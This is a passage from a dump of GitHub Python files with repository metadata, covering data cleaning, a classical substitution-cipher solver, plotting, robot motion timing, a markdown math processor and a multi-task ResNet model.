df.a_the_complaint_category_classification.str.lower(), sep=\" \"\n )\n return df.drop(\n columns=[\n \"a_the_complaint_category_classification\",\n \"b_rule_violation\",\n \"c_paragraph_violation\",\n ]\n )\n\n\ndef create_tracking_id_og_col(df):\n df.loc[:, \"tracking_id_og\"] = df.tracking_id\n return df\n\n\ndef clean():\n df = (\n realign()\n .rename(\n columns={\n \"1_name\": \"full_name\",\n \"2_badge_number\": \"badge_no\",\n \"3_gender\": \"sex\",\n \"6_unit_assignment_on_the_date_of_the_complaint_incident\": \"department_desc\",\n \"7_rank_on_the_date_of_the_complaint_incident\": \"rank_desc\",\n \"8_date_of_appointment\": \"hire_date\",\n \"e_the_final_discipline_imposed\": \"action\",\n \"a_the_incident_type\": \"incident_type\",\n \"b_the_complaint_tracking_number\": \"tracking_id\",\n \"c_the_date_on_which_the_complaint_incident_took_place\": \"occur_date\",\n \"d_the_date_on_which_the_complaint_was_received\": \"receive_date\",\n \"e_the_date_on_which_the_complaint_investigation_was_completed\": \"investigation_complete_date\",\n \"f_the_classification_of_the_complaint\": \"disposition\",\n \"g_the_status_of_the_investigation\": \"investigation_status\",\n \"1_gender\": \"complainant_sex\",\n \"2_race\": \"complainant_race\",\n }\n )\n .drop(\n columns=[\n \"d_disposition\",\n \"5_age_or_year_of_birth\",\n \"3_age_or_year_of_birth\",\n \"4_race\",\n ]\n )\n .pipe(assign_allegations)\n .pipe(split_name)\n .pipe(clean_names, [\"first_name\", \"last_name\"])\n .pipe(strip_badge)\n .pipe(clean_officer_sex)\n .pipe(\n standardize_desc_cols,\n [\n \"department_desc\",\n \"rank_desc\",\n \"action\",\n \"incident_type\",\n \"disposition\",\n \"investigation_status\",\n ],\n )\n .pipe(clean_sexes, [\"complainant_sex\"])\n .pipe(clean_races, [\"complainant_race\"])\n .pipe(\n clean_dates,\n [\"hire_date\", \"occur_date\", \"receive_date\", \"investigation_complete_date\"],\n )\n .pipe(assign_agency)\n .pipe(gen_uid, [\"first_name\", \"last_name\", \"agency\"])\n .pipe(gen_uid, [\"agency\", \"tracking_id\"], \"allegation_uid\")\n .pipe(create_tracking_id_og_col)\n .pipe(gen_uid, [\"tracking_id\", \"agency\"], \"tracking_id\")\n )\n citizen_df = df[[\"complainant_sex\", \"complainant_race\", \"allegation_uid\", \"agency\"]]\n citizen_df = citizen_df.pipe(\n gen_uid,\n [\"complainant_sex\", \"complainant_race\", \"allegation_uid\", \"agency\"],\n \"citizen_uid\",\n )\n df = df.drop(columns=[\"complainant_sex\", \"complainant_race\"])\n return df, citizen_df\n\n\nif __name__ == \"__main__\":\n df, citizen_df = clean()\n df.to_csv(deba.data(\"clean/cprr_new_orleans_harbor_pd_2020.csv\"), index=False)\n citizen_df.to_csv(\n deba.data(\"clean/cprr_cit_new_orleans_harbor_pd_2020.csv\"), index=False\n )\n","repo_name":"ipno-llead/processing","sub_path":"clean/new_orleans_harbor_pd_cprr.py","file_name":"new_orleans_harbor_pd_cprr.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"26516464557","text":"import random\nimport sys\nfrom ngram_score import ngram_score\nfrom random import shuffle\nfrom datetime import datetime\n\nfitness = ngram_score('quadgrams.txt')\n\ndef readCipherText(fileName):\n f = open(fileName, \"r\")\n text = f.read()\n return text\n\ndef firstTimeDecipher(text, freq, substitue):\n count = 0\n while(freq.items()):\n maxVal = -1\n maxKey = \"\"\n for key,value in freq.items():\n if maxVal < value:\n maxVal = value\n maxKey = key\n 
text=text.replace(chr(maxKey),substitue[count])\n count = count + 1\n freq.pop(maxKey)\n return text\n\ndef calculateIC(text):\n freq = {}\n ic=0\n\n for c in text:\n if c==\" \" or c==' ' or c==\",\" or c==\".\" or c==\"!\" or c==\";\":\n continue\n i=ord(c)\n freq[i] = freq.get(i, 0) + 1\n\n for key,value in freq.items():\n ic=ic+value*(value-1)\n \n l=len(text)\n icFinal = ic/(l*(l-1))\n\n return freq, icFinal\n\ndef decipher(ciphertext, key):\n mapping = {}\n for k in range(0,len(key)):\n mapping[key[k]]=chr(k+65)\n str1=\"\"\n # print(mapping)\n for l in range(0,len(ciphertext)):\n currentChar = ciphertext[l]\n # print(currentChar)\n if currentChar==\" \" or currentChar==\",\" or currentChar==\".\" or currentChar==\"!\" or currentChar==\";\":\n str1=str1+currentChar\n else:\n str1=str1+mapping[ciphertext[l]]\n return str1\n\ndef gen(text, now):\n max = -sys.maxsize\n key = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n \n masterKey, masterScore = key[:], max\n\n generation = 0\n cipher = text\n while (1):\n second = datetime.now()\n diff = str(second-now)\n ftr = [3600,60,1]\n s = sum([a*b for a,b in zip(ftr, map(float,diff.split(':')))])\n # print(s)\n if s>5:\n break\n\n count = 0\n \n random.shuffle(masterKey)\n masterScore = fitness.score(decipher(cipher, masterKey).replace(\" \",\"\"))\n\n while(count<1000):\n tempKey = masterKey[:]\n i = random.randint(0,25)\n j = random.randint(0,25)\n a = tempKey[i]\n b = tempKey[j]\n tempKey[i] = b\n tempKey[j] = a\n \n tempPlain = decipher(cipher, tempKey)\n tempScore = fitness.score(tempPlain.replace(\" \",\"\"))\n if tempScore > masterScore:\n masterScore = tempScore\n masterKey = tempKey[:]\n count = count/2 #Try with count=count/2\n count = count+1\n \n if max/users', views.ListPercentDiscount.as_view(), name='percent_users'),\n path('amount//users', views.AdminReport.as_view(), name='amount_users'),\n]\n","repo_name":"SepehrHasanabadi/sharifstar","sub_path":"discount/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8548550469","text":"import re\n\nfile = open(r'.\\py4e\\UsingPythonToAccessWebData\\assign01.txt')\nall_numbers = []\nsum = 0\nfor line in file:\n line = line.strip()\n line_numbers = re.findall('[0-9]+',line)\n if len(line_numbers) > 0:\n all_numbers.append(line_numbers)\nfor elem in all_numbers:\n for item in elem:\n sum += int(item)\nprint(sum)","repo_name":"agrechykhin01/PythonPlayground","sub_path":"py4e/UsingPythonToAccessWebData/assign01.py","file_name":"assign01.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8197029415","text":"import csv\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime\n\nfilename = 'data/sitka_weather_2018_simple.csv'\nwith open(filename) as f:\n\treader = csv.reader(f)\n\theader = next(reader)\n\tprint(header)\n\t\n\thighs, lows, dates = [], [], []\n\tfor row in reader:\n\t\tdate = datetime.strptime(row[2], '%Y-%m-%d')\n\t\thigh = int(row[5])\n\t\tlow = int(row[6])\n\t\tdates.append(date)\n\t\thighs.append(high)\n\t\tlows.append(low)\n\nfig, ax = plt.subplots()\nax.plot(dates, lows, c='blue', alpha=0.7)\nax.plot(dates, highs, c='red', alpha=0.7)\nax.fill_between(dates, highs, lows, facecolor='blue', alpha=0.1)\n\nax.set_title(\"Daily high and low temperatures - 2018 (Sitka)\", fontsize=24)\nfig.autofmt_xdate()\nax.set_ylabel(\"Temperature (F)\", 
fontsize=16)\nax.tick_params(axis='both', labelsize=12)\n\nplt.show()\n\n\n","repo_name":"HaiseX7/Data-Visualization","sub_path":"sitka_highs_lows.py","file_name":"sitka_highs_lows.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2647874144","text":"from CustomModules import global_vars\nimport numpy as np\nimport math\n\n\nclass TimeCalculations:\n \"\"\"\n This class calculates the needed time to pass a sub frame by using user inputs and classic physics.\n \"\"\"\n \n max_speed = global_vars.MAX_SPEED_IN_METERS # Max speed that an end effector can have.\n min_speed = global_vars.MIN_SPEED_IN_METERS # Min speed that an end effector can have.\n max_acceleration = global_vars.MAX_ACCLERATION # Max acceleration that an end effector can have.\n min_acceleration = global_vars.MIN_ACCLERATION # Min acceleration that an end effector can have.\n\n def __init__(self):\n self.start_velocity = float(0) # Start velocity of frame\n self.end_velocity = float(0) # End velocity of frame\n self.acceleration = float(0) # Acceleration within a frame\n self.total_length_of_spline_part = float(0) # Total path length of frame\n self.total_time_passed = float(0) # Time passed till stated point\n self.delta_t = float(0) # Time for stated user inputted frame\n self.total_spline = float(0) # Total path length passed till stated point\n self.i = 1 # Counter for calcuations \n \n self.k = 1 # Counter for calcuations \n self.g = 0 # Counter for calcuations \n self.m = 1 # Counter for calcuations \n \n self.average_speeds_of_frames = [] # Average speed within a user inputted frame\n self.times_of_intervals = [] # Time values for sub-frames\n self.velocities = [] # List of velocities\n self.start_velocities = [] # List of frames' start velocities\n self.accelerations = [] # List of accelerations within frames \n self.end_velocities = [] # List of end velocities\n self.times_and_velocities_for_end_effector = [] # Returning list of calculated frame times and velocities\n \n def calculating_average_end_effector_speed(self, list_position, time_vs_u,xs,zs):\n \"\"\"\n Calculating the average speed within frames. 
Average speed values are used in end_velocity calculations for double acceleration frames.\n\n Parameter\n ---------\n list_positions : list type\n List of list indexes for user inputted frames after populated spline.\n\n time vs_u : list type\n Time values corresponding u values as user inputted.\n \n xs : list type\n List of x values corresponding to the divided path values values\n\n zs : list type\n List of z values corresponding to the divided path values values\n\n Returns\n -------\n self.average_speeds_of_frames : list type\n Average speed within a user inputted frame\n \n Errors\n ------\n Error_Type: 101 \n Max speed limit is exceeding please increase the frame time\n \"\"\"\n \n a = 0\n b = 1\n frame = -1\n for pos in list_position:\n frame += 1\n length_of_spline_part = 0\n if a == 0:\n a += 1\n pass\n else:\n while a < (pos+1) and (a-1) < list_position[-1]:\n temp_length_of_small_piece = ( (xs[a]-xs[a-1])**2 + (zs[a]-zs[a-1])**2 )**0.5\n length_of_spline_part += temp_length_of_small_piece\n a += 1\n frame_time = time_vs_u[b][0] - time_vs_u[b-1][0]\n average_speed_in_frame = length_of_spline_part / frame_time\n b += 1\n if average_speed_in_frame > self.max_speed:\n raise ValueError (f\"Error_Type=101,Frame={frame}\")\n \n self.average_speeds_of_frames.append(average_speed_in_frame)\n del a\n del b\n del length_of_spline_part\n del average_speed_in_frame\n\n return self.average_speeds_of_frames\n \n def solving_with_jerk_control(self,pos,list_position, end_velocity,time_vs_u,xs,zs):\n \"\"\"\n Calculating acceleration and velocities to solve the inputted frame by using jerk calculation method\n #TODO: jerk calculation methodun açıklama linki eklenecek.\n Parameter\n ---------\n pos : integer type\n List index corresponding to the user inputted frame within all sub frames\n\n list_positions : list type\n List of list indexes for user inputted frames after populated spline.\n\n end_velocity : float type\n End velocity of the frame which is calculating. 
\n\n time vs_u : list type\n Time values corresponding u values as user inputted.\n \n xs : list type\n List of x values corresponding to the divided path values values.\n\n zs : list type\n List of z values corresponding to the divided path values values.\n\n Returns\n -------\n self.times_and_velocities_for_end_effector : list type\n Returning list of calculated frame times and velocities.\n \n Errors\n ------\n Error_Type: 101 \n Max speed limit is exceeding please increase the frame time\n Error_Type: 102 \n Max speed limit is exceeding please increase the frame time\n Error_Type: 103\n There are no real roots to compute this frame's velocties.\n \"\"\"\n \n \n self.total_length_of_spline_part = float(0)\n # First we fing the length of spline\n while self.m < (pos+1) and (self.m-1) < list_position[-1]:\n length_of_small_piece = ( (xs[self.m]-xs[self.m-1])**2 + (zs[self.m]-zs[self.m-1])**2 )**0.5 \n self.total_length_of_spline_part += length_of_small_piece\n self.m += 1\n self.total_spline += self.total_length_of_spline_part\n self.delta_t = time_vs_u[self.i][0] - time_vs_u[self.i-1][0]\n \n\n # Acceleration is written as a = b * t + c\n # a = acceleration\n # b = b_element\n # c = c_element\n # Finding velocity and location by integrating acceleration\n # end_velocity = b * t^2 / 2 + c * t + start_velocity\n # location = (b * t^3)/6 +(c * t^2)/2 + start_velocity * t\n # Using the equations above we found c_element and b_element as below:\n self.end_velocity = end_velocity\n c_element = (self.total_length_of_spline_part - self.end_velocity * self.delta_t/3 - 2 * self.start_velocity * self.delta_t /3)/((self.delta_t**2)/6)\n b_element = (self.end_velocity - self.start_velocity - c_element * self.delta_t)/((self.delta_t**2) / 2)\n \n \n velocity = self.start_velocity\n time_at_sub_frame = 0\n length_of_intervals = []\n all_roots = []\n total_length = 0\n old_velocity = velocity\n\n while self.k < (pos + 1) and (self.k-1) < list_position[-1]:\n length_of_interval = ( (xs[self.k]-xs[self.k-1])**2 + (zs[self.k]-zs[self.k-1])**2 )**0.5\n length_of_intervals.append(length_of_interval)\n total_length += length_of_interval\n # Solving time for each length of interval means solving 3. 
degree equation derived from definite integral:\n # location = (b * t^3)/6 +(c * t^2)/2 + start_velocity * t\n\n coef1 = b_element / 6\n coef2 = c_element / 2\n coef3 = self.start_velocity\n coef4 = -total_length\n np_coefs = [coef1,coef2,coef3,coef4]\n roots = np.roots(np_coefs)\n all_roots.append(roots)\n temp =[]\n for root in roots:\n if root > 0 and abs(np.imag(root))<0.0001 :\n temp2 = np.real(root)\n temp.append(temp2)\n if len(temp) == 1:\n time_at_sub_frame = temp[0]\n elif len(temp) >= 2:\n if time_at_sub_frame > min(temp):\n time_at_sub_frame = max(temp)\n else:\n time_at_sub_frame = min(temp)\n else:\n raise ValueError (f\"Error_Type=104,Frame={self.i}\")\n del temp2\n np_coefs.clear()\n temp.clear()\n \n # Solving velocity as a definite integral\n velocity = self.start_velocity + b_element * (time_at_sub_frame**2) /2 + c_element * (time_at_sub_frame)\n # Controlling maximum velocity and acceleration\n control_acceleration = (velocity - old_velocity) / self.delta_t\n if abs(control_acceleration) > self.max_acceleration:\n raise ValueError (f\"Error_Type=102,Frame={self.i}\")\n if abs(velocity) > self.max_speed:\n raise ValueError (f\"Error_Type=103,Frame={self.i}\")\n \n self.times_of_intervals.append(self.total_time_passed + time_at_sub_frame)\n self.velocities.append(velocity)\n self.k += 1\n old_velocity = velocity\n \n self.total_time_passed += time_at_sub_frame\n\n self.start_velocity = velocity\n \n \n \n \n if abs(velocity - self.end_velocity)<0.001:\n print(\"Velocities are same as calculated at the end-- double_acceleration_within_a_frame in TimeCalculations class\")\n else:\n print(\"There is something wrong with the velocities-- double_acceleration_within_a_frame in TimeCalculations class\")\n \n if len(self.velocities) == len(self.times_of_intervals):\n while self.g < len(self.velocities):\n self.times_and_velocities_for_end_effector.append((self.times_of_intervals[self.g],self.velocities[self.g]))\n self.g += 1\n else:\n print(\"There is something wrong with the length of time arrivals-- double_acceleration_within_a_frame in TimeCalculations class\")\n self.i += 1\n \n del old_velocity\n del velocity\n del b_element\n del c_element\n del np_coefs\n del coef1\n del coef2\n del coef3\n del coef4\n del temp\n del root\n del roots\n del all_roots\n \n return self.times_and_velocities_for_end_effector \n \n def stopped_frame(self,time_vs_u):\n \"\"\"\n Importing stopped frames as frames into the list self.times_and_velocities_for_end_effector\n\n Parameters\n ----------\n time vs_u : list type\n Time values corresponding u values as user inputted.\n \n Returns\n -------\n self.times_and_velocities_for_end_effector : list type\n Returning list of calculated frame times and velocities\n\n \"\"\"\n self.delta_t = time_vs_u[self.i][0] - time_vs_u[self.i-1][0]\n self.total_time_passed += self.delta_t\n self.times_of_intervals.append(self.total_time_passed)\n self.velocities.append(0)\n \n if self.g == 0:\n self.g = 2\n else: \n self.g += 1\n self.i += 1\n self.times_and_velocities_for_end_effector.append((self.times_of_intervals[-1],\"stop\"))\n \n print(\"Stopped Frame calculated\")\n return self.times_and_velocities_for_end_effector\n \n def zeroth_frame(self):\n \"\"\"\n Adding needed values of time and velocities to the lists \"self.times_of_intervals\" and \"self.velocities\" for starting point\n \"\"\"\n self.times_of_intervals.append(float(0))\n 
self.velocities.append(float(0))","repo_name":"Levitate-Git/g-petto-commandGenerator","sub_path":"Smoothing_Modules/time_calculation.py","file_name":"time_calculation.py","file_ext":"py","file_size_in_byte":12258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73649809216","text":"import re\n\n# 3rd party\nimport markdown.postprocessors\n\n# this package\nfrom py2latex.markdown_parser.utils import unescape_latex_entities\n\n__all__ = [\"MathTextPostProcessor\"]\n\n\nclass MathTextPostProcessor(markdown.postprocessors.Postprocessor):\n\n\tdef run(self, instr):\n\t\t\"\"\"\n\t\tConvert all math sections in {text} whether LaTeX, asciimathml or latexmathml formatted to LaTeX.\n\n\t\tThis assumes you are using $ for inline math and ``$$`` for blocks as your mathematics delimiter\n\t\t(*not* the standard asciimathml or latexmathml delimiter).\n\t\t\"\"\"\n\n\t\tdef repl_1(matchobj) -> str:\n\t\t\t\"\"\"\n\n\t\t\t:param matchobj:\n\t\t\t:type matchobj:\n\n\t\t\t:return:\n\t\t\t:rtype: str\n\t\t\t\"\"\"\n\n\t\t\ttext = unescape_latex_entities(matchobj.group(1))\n\t\t\treturn f\"\\\\[{text}\\\\]\"\n\n\t\tdef repl_2(matchobj) -> str:\n\t\t\t\"\"\"\n\n\t\t\t:param matchobj:\n\t\t\t\"\"\"\n\n\t\t\ttext = unescape_latex_entities(matchobj.group(1))\n\t\t\treturn f\"\\\\({text}\\\\)\"\n\n\t\t# This $$x=3$$ is block math\n\t\tpat = re.compile(r\"\\$\\$([^$]*)\\$\\$\")\n\t\tout = pat.sub(repl_1, instr)\n\n\t\t# This $x=3$ is inline math\n\t\tpat2 = re.compile(r\"\\$([^$]*)\\$\")\n\t\tout = pat2.sub(repl_2, out)\n\n\t\t# some extras due to asciimathml\n\t\tout = out.replace(\"\\\\lt\", '<')\n\t\tout = out.replace(\" * \", \" \\\\cdot \")\n\t\tout = out.replace(\"\\\\del\", \"\\\\partial\")\n\n\t\treturn out\n","repo_name":"domdfcoding/py2latex","sub_path":"py2latex/markdown_parser/maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"70889209857","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: yapan liu (su)\n\"\"\"\n\nimport pandas as pd\n\n# pull the information of the dataset which is used to train the model\ndef datasetInfo(dataset_id, ob_type):\n # id: the id of the dataset from ASHRAE OB database\n # df = pd.read_excel('./Models/all_studies_info_simplified.xlsx') \n # df.to_parquet('./Models/all_studies_info_simplified.parquet', engine='pyarrow')\n \n # read from the parquet file\n df = pd.read_parquet('./Models/all_studies_info_simplified.parquet', engine='pyarrow')\n \n # select the data based on the dataset id and the behavior type\n df_select = df[(df['Study ID'] == dataset_id) & (df['Behavior Type'] == ob_type)].copy()\n df_select.set_index('Study ID', inplace=True)\n \n return df_select \n\n# crop the white region of the image in linux: \"convert -trim input.jpg output.jpg\"\n\n# pull the model contributor information\ndef modelContributor(behavior_type, model_name):\n df = pd.read_csv(\"./Models/Model_Info.csv\")\n df.replace(r'\\n', '; ', regex=True, inplace=True)\n contributor_columns = [\"Contributor\", \"Affiliation\",\"Dataset\", \"Related_Publication\"]\n model_info_columns = [\"Behavior_Type\",\"Model_Name\",\"Model_Type\",\"Model_Details\",\"Model_Input\",\"Model_Output\",\"Model_Training\",\"Model_Testing\"]\n \n # model contributor information\n df_contributor = df.loc[(df['Behavior_Type'] == behavior_type) & (df['Model_Name'] == model_name), contributor_columns].copy()\n df_contributor = 
df_contributor.T\n df_contributor.columns = ['Information']\n \n # model information\n df_model = df.loc[(df['Behavior_Type'] == behavior_type) & (df['Model_Name'] == model_name), model_info_columns].copy()\n df_model = df_model.T\n df_model.columns = ['Information']\n \n # replace _ with space in the columns and index names\n df_model.replace('_', ' ', regex=True, inplace=True)\n df_model.index = df_model.index.str.replace('_', ' ', regex=True)\n \n df_contributor.replace('_', ' ', regex=True, inplace=True)\n df_contributor.index = df_contributor.index.str.replace('_', ' ', regex=True)\n \n return df_model, df_contributor\n \n \n\nif __name__ == \"__main__\":\n \n # dataset_id = 26\n # ob_type = \"Window_Status\"\n # datasetInfo(dataset_id, ob_type)\n \n # data_path = './Models/Window_Status/SVM_E3D/'\n df_model, df_contributor = modelContributor(behavior_type='Window_Status', model_name='SVM_E3D')\n print(df_model)\n print(df_contributor)\n print(\"\")\n\n","repo_name":"yapanliu/OBlib","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"40313394024","text":"\"\"\"\nThis example demonstrates a call to rocketunits.convert_value\n\"\"\"\nfrom rocketunits.rocket_units import convert_value\n\ndef disp( val, inp_units, out_units ):\n # use convert_value to convert inp_units to out_units\n ans = convert_value(val, inp_units, out_units)\n \n print( f'{val} {inp_units} = {ans} {out_units}' )\n\n# convert_value gives the following output\n\ndisp( 180, 'deg', 'rad' ) # ==> 180 deg = 3.1415926535820002 rad\n\ndisp( 100, 'rpm', 'deg/s' ) # ==> 100 rpm = 600.0 deg/s\n\ndisp( 1, 'lbm/in**3', 'g/ml' ) # ==> 1 lbm/in**3 = 27.6799047102 g/ml\n","repo_name":"sonofeft/RocketUnits","sub_path":"rocketunits/examples/example_1.py","file_name":"example_1.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38602946686","text":"t = int(input())\nx = 1\nwhile x<=t:\n n = int(input())\n filas = []\n columnas = []\n for i in range(0,n):\n filas.append(set())\n columnas.append(set())\n total=0\n for i in range(0,n):\n line=input().split()\n for j in range(0,n):\n m = int(line[j])\n if i==j:\n total+=m\n filas[i].add(m)\n columnas[j].add(m)\n f=0\n c=0\n for fila in filas:\n if len(fila) None:\n super().__init__()\n backbone_net = build_backbone(\n backbone, detector, segmentor, kwargs)\n attention_ch = kwargs['attention_channels']\n self.task_per_dset = kwargs['task_per_dset']\n \n self.shared_layer1_b = backbone_net.body.layer1[:-1] \n self.shared_layer1_t = backbone_net.body.layer1[-1]\n\n self.shared_layer2_b = backbone_net.body.layer2[:-1]\n self.shared_layer2_t = backbone_net.body.layer2[-1]\n\n self.shared_layer3_b = backbone_net.body.layer3[:-1]\n self.shared_layer3_t = backbone_net.body.layer3[-1]\n\n self.shared_layer4_b = backbone_net.body.layer4[:-1]\n self.shared_layer4_t = backbone_net.body.layer4[-1]\n \n self.fpn = backbone_net.fpn\n \n self.stem_dict = nn.ModuleDict()\n self.head_dict = nn.ModuleDict()\n \n stem_weight = kwargs['state_dict']['stem']\n for data, cfg in task_cfg.items():\n task = cfg['task']\n num_classes = cfg['num_classes']\n \n if task == 'clf':\n stem = ClfStem(**cfg['stem'])\n head = build_classifier(\n backbone, num_classes, cfg['head'])\n stem.apply(init_weights)\n \n \n elif task == 'det':\n stem = DetStem(**cfg['stem'])\n \n 
head_kwargs = {'num_anchors': len(backbone_net.body.return_layers)+1}\n head = build_detector(\n backbone, detector, \n backbone_net.fpn_out_channels, num_classes, **head_kwargs)\n if stem_weight is not None:\n ckpt = torch.load(stem_weight)\n stem.load_state_dict(ckpt, strict=False)\n print(\"!!!Load weights for detection stem layer!!!\")\n \n # stem = DetStem()\n # head = build_detector(detector, backbone.fpn_out_channels, \n # cfg['num_classes'])\n # if stem_weight is not None:\n # ckpt = torch.load(stem_weight)\n # stem.load_state_dict(ckpt)\n \n elif task == 'seg':\n stem = SegStem(**cfg['stem'])\n head = build_segmentor(segmentor, num_classes=num_classes, cfg_dict=cfg['head'])\n if stem_weight is not None:\n ckpt = torch.load(stem_weight)\n stem.load_state_dict(ckpt, strict=False)\n print(\"!!!Load weights for segmentation stem layer!!!\")\n \n # stem = SegStem(**cfg['stem'])\n # head = build_segmentor(segmentor, cfg['head'])\n # if stem_weight is not None:\n # ckpt = torch.load(stem_weight)\n # stem.load_state_dict(ckpt)\n \n head.apply(init_weights)\n self.stem_dict.update({data: stem})\n self.head_dict.update({data: head})\n \n self.down_sampling = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)\n \n self.att_encoder1 = nn.ModuleDict({k: self.att_layer(attention_ch[0], attention_ch[0]//4, attention_ch[0]) for k in task_cfg.keys()})\n self.att_encoder2 = nn.ModuleDict({k: self.att_layer(2 * attention_ch[1], attention_ch[1]//4, attention_ch[1]) for k in task_cfg.keys()})\n self.att_encoder3 = nn.ModuleDict({k: self.att_layer(2 * attention_ch[2], attention_ch[2]//4, attention_ch[2]) for k in task_cfg.keys()})\n self.att_encoder4 = nn.ModuleDict({k: self.att_layer(2 * attention_ch[3], attention_ch[3]//4, attention_ch[3]) for k in task_cfg.keys()})\n \n self.encoder_block_att1 = self.att_block_layer(attention_ch[0], attention_ch[1] // 4)\n self.encoder_block_att2 = self.att_block_layer(attention_ch[1], attention_ch[2] // 4)\n self.encoder_block_att3 = self.att_block_layer(attention_ch[2], attention_ch[3] // 4)\n \n \n def att_layer(self, in_channel, intermediate_channel, out_channel):\n return nn.Sequential(\n nn.Conv2d(in_channels=in_channel, out_channels=intermediate_channel, kernel_size=1, padding=0),\n nn.BatchNorm2d(intermediate_channel),\n nn.ReLU(inplace=True),\n nn.Conv2d(in_channels=intermediate_channel, out_channels=out_channel, kernel_size=1, padding=0),\n nn.BatchNorm2d(out_channel),\n nn.Sigmoid())\n \n\n def att_block_layer(self, in_channel, out_channel):\n downsample = nn.Sequential(conv1x1(in_channel, 4 * out_channel, stride=1),\n nn.BatchNorm2d(4 * out_channel))\n return Bottleneck(in_channel, out_channel, downsample=downsample)\n\n \n def _generate_features(self, data_dict, tasks):\n mode = 'train' if self.training else 'val'\n det_feats = OrderedDict()\n seg_feats = OrderedDict()\n \n # ttt = True if 'voc' in data_dict else False\n \n stem_feats = OrderedDict(\n {dset: self.stem_dict[dset](data[0]) for dset, data in data_dict.items()}\n )\n \n shared_backbone_feat1 = OrderedDict(\n {dset: self.shared_layer1_b(data) for dset, data in stem_feats.items()}\n )\n shared_last_feat1 = OrderedDict(\n {dset: self.shared_layer1_t(data) for dset, data in shared_backbone_feat1.items()}\n )\n \n shared_backbone_feat2 = OrderedDict(\n {dset: self.shared_layer2_b(data) for dset, data in shared_last_feat1.items()}\n )\n shared_last_feat2 = OrderedDict(\n {dset: self.shared_layer2_t(data) for dset, data in shared_backbone_feat2.items()}\n )\n \n shared_backbone_feat3 = 
OrderedDict(\n {dset: self.shared_layer3_b(data) for dset, data in shared_last_feat2.items()}\n )\n shared_last_feat3 = OrderedDict(\n {dset: self.shared_layer3_t(data) for dset, data in shared_backbone_feat3.items()}\n )\n \n shared_backbone_feat4 = OrderedDict(\n {dset: self.shared_layer4_b(data) for dset, data in shared_last_feat3.items()}\n )\n shared_last_feat4 = OrderedDict(\n {dset: self.shared_layer4_t(data) for dset, data in shared_backbone_feat4.items()}\n ) \n \n a_1_mask = {dset: self.att_encoder1[dset](back_feat) for dset, back_feat in shared_backbone_feat1.items()} \n a_1 = {dset: a_1_mask_i * shared_last_feat1[dset] for dset, a_1_mask_i in a_1_mask.items()} \n det_feats.update({'0': f for t, f in a_1.items() if self.task_per_dset[t] == 'det'})\n a_1 = {dset: self.down_sampling(self.encoder_block_att1(a_1_i)) for dset, a_1_i in a_1.items()}\n \n \n a_2_mask = {dset: self.att_encoder2[dset](torch.cat(\n (back_feat, a_1[dset]), dim=1)) for dset, back_feat in shared_backbone_feat2.items()} \n a_2 = {dset: a_2_mask_i * shared_last_feat2[dset] for dset, a_2_mask_i in a_2_mask.items()} \n det_feats.update({'1': f for t, f in a_2.items() if self.task_per_dset[t] == 'det'})\n a_2 = {dset: self.down_sampling(self.encoder_block_att2(a_2_i)) for dset, a_2_i in a_2.items()}\n \n \n a_3_mask = {dset: self.att_encoder3[dset](torch.cat(\n (back_feat, a_2[dset]), dim=1)) for dset, back_feat in shared_backbone_feat3.items()} \n a_3 = {dset: a_3_mask_i * shared_last_feat3[dset] for dset, a_3_mask_i in a_3_mask.items()} \n det_feats.update({'2': f for t, f in a_3.items() if self.task_per_dset[t] == 'det'})\n seg_feats.update({'2': f for t, f in a_3.items() if self.task_per_dset[t] == 'seg'})\n a_3 = {dset: self.encoder_block_att3(a_3_i) for dset, a_3_i in a_3.items()}\n \n a_4_mask = {dset: self.att_encoder4[dset](torch.cat(\n (back_feat, a_3[dset]), dim=1)) for dset, back_feat in shared_backbone_feat4.items()} \n a_4 = {dset: a_4_mask_i * shared_last_feat4[dset] for dset, a_4_mask_i in a_4_mask.items()} \n det_feats.update({'3': f for t, f in a_4.items() if self.task_per_dset[t] == 'det'})\n seg_feats.update({'3': f for t, f in a_4.items() if self.task_per_dset[t] == 'seg'})\n \n total_losses = OrderedDict()\n \n for dset, att_feats in a_4.items():\n task = tasks[dset]\n head = self.head_dict[dset]\n targets = data_dict[dset][1]\n \n if task == 'clf':\n out = head(att_feats, targets)\n \n if mode == 'val':\n return dict(outputs=out)\n \n elif task == 'det':\n fpn_feats = self.fpn(det_feats)\n \n out = head(data_dict[dset][0], fpn_feats, \n origin_targets=targets, \n trs_fn=self.stem_dict[dset].transform)\n \n if mode == 'val':\n return out\n \n elif task == 'seg':\n out = head(\n seg_feats, targets, input_shape=data_dict[dset][0].shape[-2:])\n \n if mode == 'val':\n return dict(outputs=out)\n \n total_losses.update({f\"{dset}_{k}\": l for k, l in out.items()})\n \n return total_losses\n \n \n def forward(self, data_dict, kwargs):\n if not self.training:\n if not hasattr(data_dict, 'items'):\n data_dict = {list(kwargs.keys())[0]: [data_dict, None]}\n \n return self._generate_features(data_dict, kwargs)\n \n\n \n \n","repo_name":"kcs6568/mtl","sub_path":"lib/model_api/task_model/mtan_resnet.py","file_name":"mtan_resnet.py","file_ext":"py","file_size_in_byte":10891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72023697534","text":"import sys\nfrom typing import List\n\ndef maxProfit_brute_force(prices: 